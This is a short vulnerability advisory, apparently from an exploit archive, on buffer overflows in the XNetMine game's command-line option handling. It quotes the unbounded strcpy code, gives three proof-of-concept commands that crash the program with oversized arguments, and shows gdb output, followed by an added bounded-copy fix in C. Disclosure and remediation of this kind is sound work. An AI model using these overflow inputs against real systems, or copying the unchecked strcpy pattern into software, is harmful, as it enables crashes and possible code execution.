XNetMine.txt
Posted Oct 20, 2006
Authored by federico | Site defsol.plugs.it

XNetMine suffers from multiple buffer overflow vulnerabilities. The included PoC crashes XNetMine.

tags | exploit, overflow
SHA-256 | a2fc3791deffb5ecd911059e7f5a82944a96906478013639e2b12aabd27d7c48


//

Vendor: Martin Bauer
Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz

*Vulnerable code:*
--
line: 672/676

if (strncmp("-PortNumber",argv[t+1],11)==0)
{
    char text[500];
    strcpy(text,argv[t+1]);
    strcpy(Port,&text[11]);
}
--
line: 677/682

if (strncmp("-Name",argv[t+1],5)==0)
{
    char text[500];
    strcpy(text,argv[t+1]);
    strcpy(User,&text[5]);
}
--
line: 683/688

if (strncmp("-ServerName",argv[t+1],11)==0)
{
    char text[500];
    strcpy(text,argv[t+1]);
    strcpy(ServerName,&text[11]);
}
--

*Proof of concept:*
--
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`
Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...)
ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA
Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:""
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:31337
Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
--

*Debug information:*
--
(gdb) p $eip
$1 = (void (*)()) 0x804a862 <main+753>
(gdb) stepi
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
SIGSEGV 0x0804a862 in main ()

-- federico
federico@plugs.it / http://defsol.plugs.it/

//
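
A bounded replacement for the three option handlers quoted under "Vulnerable code", added here as an example; it is not XNetMine's or the advisory author's code. The sizes of Port, User and ServerName and the helper names copy_opt_value and parse_option are assumptions, since the advisory does not show the declarations.

```c
#include <stdio.h>
#include <string.h>

/* Assumed sizes: the advisory does not show these declarations. */
static char Port[16], User[64], ServerName[256];

enum opt_result { OPT_OK = 0, OPT_NO_MATCH = -1, OPT_TOO_LONG = -2 };

/* Hypothetical helper: copy the value following `prefix` in `arg` into dst.
 * The length is checked before any byte is written, and an oversized
 * value is rejected rather than silently truncated. No 500-byte
 * intermediate buffer is needed. */
static enum opt_result copy_opt_value(const char *arg, const char *prefix,
                                      char *dst, size_t dstsz)
{
    size_t plen = strlen(prefix);
    size_t vlen;
    if (arg == NULL || strncmp(prefix, arg, plen) != 0)
        return OPT_NO_MATCH;
    vlen = strlen(arg + plen);
    if (vlen >= dstsz)              /* keep room for the NUL */
        return OPT_TOO_LONG;
    memcpy(dst, arg + plen, vlen + 1);
    return OPT_OK;
}

/* Hypothetical dispatcher for the three options named in the advisory. */
static enum opt_result parse_option(const char *arg)
{
    enum opt_result r;
    r = copy_opt_value(arg, "-PortNumber", Port, sizeof Port);
    if (r == OPT_NO_MATCH)
        r = copy_opt_value(arg, "-Name", User, sizeof User);
    if (r == OPT_NO_MATCH)
        r = copy_opt_value(arg, "-ServerName", ServerName, sizeof ServerName);
    return r;
}

int main(int argc, char **argv)
{
    for (int t = 1; t < argc; t++) {
        if (parse_option(argv[t]) == OPT_TOO_LONG) {
            fprintf(stderr, "option value too long: %.20s...\n", argv[t]);
            return 1;
        }
    }
    printf("PortNum:%s Name:\"%s\" ServerName:\"%s\"\n", Port, User, ServerName);
    return 0;
}
```

With this check in place, an oversized value makes the program exit with an error and leaves the destination buffers untouched.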
